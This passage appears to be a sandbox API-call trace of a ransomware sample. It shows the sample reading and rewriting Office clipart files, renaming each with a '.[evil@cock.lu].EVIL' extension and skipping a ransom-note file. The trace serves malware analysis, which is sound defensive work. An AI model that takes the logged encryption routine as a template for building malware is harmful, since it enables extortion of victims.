(normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00646_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.739] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x31e2, lpOverlapped=0x0) returned 1 [0157.746] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.746] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.746] _errno () returned 0x84b1160840 [0157.746] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.746] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x3200, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3200, lpOverlapped=0x0) returned 1 [0157.746] CloseHandle (hObject=0x1a8) returned 1 [0157.746] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00646_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.747] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.747] __uncaught_exception () returned 0x84b1160800 [0157.747] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.747] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00646_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00646_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00646_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00646_.wmf.[evil@cock.lu].evil")) returned 1 [0157.748] ??_V@YAXPEAX@Z () returned 0x1 [0157.751] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00646_.WMF", dwFileAttributes=0x200) returned 0 [0157.751] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.751] wcsstr (_Str="MUSIC_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.751] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 69 [0157.751] wcscmp (_String1="MUSIC_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.751] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="MUSIC_01.MID") returned 0x0 [0157.751] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 0x45 [0157.751] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\music_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.753] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1ae0, lpOverlapped=0x0) returned 1 [0157.760] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.760] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.760] _errno () returned 0x84b1160840 [0157.760] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.760] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1b00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b00, lpOverlapped=0x0) returned 1 [0157.760] CloseHandle (hObject=0x1a8) returned 1 [0157.760] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.760] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.760] __uncaught_exception () returned 0x84b1160800 [0157.760] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.761] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\music_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\music_01.mid.[evil@cock.lu].evil")) returned 1 [0157.762] ??_V@YAXPEAX@Z () returned 0x1 [0157.764] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID", dwFileAttributes=0x200) returned 0 [0157.765] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.765] wcsstr (_Str="NA00042_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.765] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00042_.WMF") returned 69 [0157.765] wcscmp (_String1="NA00042_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.765] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00042_.WMF") returned 0x0 [0157.765] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00042_.WMF") returned 0x45 [0157.765] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00042_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00042_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.767] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5044, lpOverlapped=0x0) returned 1 [0157.780] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.780] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.780] _errno () returned 0x84b1160840 [0157.780] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.780] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x5060, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5060, lpOverlapped=0x0) returned 1 [0157.780] CloseHandle (hObject=0x1a8) returned 1 [0157.780] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00042_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.781] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.781] __uncaught_exception () returned 0x84b1160800 [0157.781] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.781] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00042_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00042_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00042_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00042_.wmf.[evil@cock.lu].evil")) returned 1 [0157.782] ??_V@YAXPEAX@Z () returned 0x1 [0157.784] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00042_.WMF", dwFileAttributes=0x200) returned 0 [0157.784] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.784] wcsstr (_Str="NA00057_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.784] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00057_.WMF") returned 69 [0157.784] wcscmp (_String1="NA00057_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.784] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00057_.WMF") returned 0x0 [0157.784] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00057_.WMF") returned 0x45 [0157.784] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00057_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00057_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.787] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2a42, lpOverlapped=0x0) returned 1 [0157.793] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.793] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.793] _errno () returned 0x84b1160840 [0157.794] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.794] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x2a60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2a60, lpOverlapped=0x0) returned 1 [0157.794] CloseHandle (hObject=0x1a8) returned 1 [0157.794] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00057_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.794] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.794] __uncaught_exception () returned 0x84b1160800 [0157.794] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.794] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00057_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00057_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00057_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00057_.wmf.[evil@cock.lu].evil")) returned 1 [0157.795] ??_V@YAXPEAX@Z () returned 0x1 [0157.798] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00057_.WMF", dwFileAttributes=0x200) returned 0 [0157.798] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.798] wcsstr (_Str="NA00058_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.798] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00058_.WMF") returned 69 [0157.798] wcscmp (_String1="NA00058_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.798] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00058_.WMF") returned 0x0 [0157.798] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00058_.WMF") returned 0x45 [0157.798] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00058_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00058_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.800] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xeaa, lpOverlapped=0x0) returned 1 [0157.807] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.807] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.807] _errno () returned 0x84b1160840 [0157.807] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.807] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xec0, lpOverlapped=0x0) returned 1 [0157.807] CloseHandle (hObject=0x1a8) returned 1 [0157.807] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00058_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.808] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.808] __uncaught_exception () returned 0x84b1160800 [0157.808] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.808] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00058_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00058_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00058_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00058_.wmf.[evil@cock.lu].evil")) returned 1 [0157.809] ??_V@YAXPEAX@Z () returned 0x1 [0157.812] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00058_.WMF", dwFileAttributes=0x200) returned 0 [0157.812] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.812] wcsstr (_Str="NA00068_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.812] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00068_.WMF") returned 69 [0157.812] wcscmp (_String1="NA00068_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.812] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00068_.WMF") returned 0x0 [0157.812] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00068_.WMF") returned 0x45 [0157.812] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00068_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00068_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.814] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1324, lpOverlapped=0x0) returned 1 [0157.821] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.821] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.821] _errno () returned 0x84b1160840 [0157.821] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.822] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x1340, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1340, lpOverlapped=0x0) returned 1 [0157.822] CloseHandle (hObject=0x1a8) returned 1 [0157.822] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00068_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.822] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.822] __uncaught_exception () returned 0x84b1160800 [0157.822] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.823] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00068_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00068_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00068_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00068_.wmf.[evil@cock.lu].evil")) returned 1 [0157.823] ??_V@YAXPEAX@Z () returned 0x1 [0157.827] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00068_.WMF", dwFileAttributes=0x200) returned 0 [0157.827] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.827] wcsstr (_Str="NA00238_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.827] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00238_.WMF") returned 69 [0157.827] wcscmp (_String1="NA00238_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.827] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00238_.WMF") returned 0x0 [0157.827] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00238_.WMF") returned 0x45 [0157.827] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00238_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00238_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.830] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1384, lpOverlapped=0x0) returned 1 [0157.838] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.838] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.838] _errno () returned 0x84b1160840 [0157.838] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.838] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x13a0, lpOverlapped=0x0) returned 1 [0157.838] CloseHandle (hObject=0x1a8) returned 1 [0157.838] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00238_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.839] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.839] __uncaught_exception () returned 0x84b1160800 [0157.839] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.839] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00238_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00238_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00238_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00238_.wmf.[evil@cock.lu].evil")) returned 1 [0157.840] ??_V@YAXPEAX@Z () returned 0x1 [0157.844] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00238_.WMF", dwFileAttributes=0x200) returned 0 [0157.844] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.844] wcsstr (_Str="NA00330_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.844] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00330_.WMF") returned 69 [0157.844] wcscmp (_String1="NA00330_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.844] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00330_.WMF") returned 0x0 [0157.844] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00330_.WMF") returned 0x45 [0157.844] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00330_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00330_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.846] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x864, lpOverlapped=0x0) returned 1 [0157.855] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.855] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.855] _errno () returned 0x84b1160840 [0157.855] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.855] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x880, lpOverlapped=0x0) returned 1 [0157.855] CloseHandle (hObject=0x1a8) returned 1 [0157.855] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00330_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.856] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.856] __uncaught_exception () returned 0x84b1160800 [0157.856] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.856] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00330_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00330_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00330_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00330_.wmf.[evil@cock.lu].evil")) returned 1 [0157.857] ??_V@YAXPEAX@Z () returned 0x1 [0157.860] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00330_.WMF", dwFileAttributes=0x200) returned 0 [0157.861] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.861] wcsstr (_Str="NA00388_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.861] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00388_.WMF") returned 69 [0157.861] wcscmp (_String1="NA00388_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.861] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00388_.WMF") returned 0x0 [0157.861] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00388_.WMF") returned 0x45 [0157.861] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00388_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00388_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.863] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: 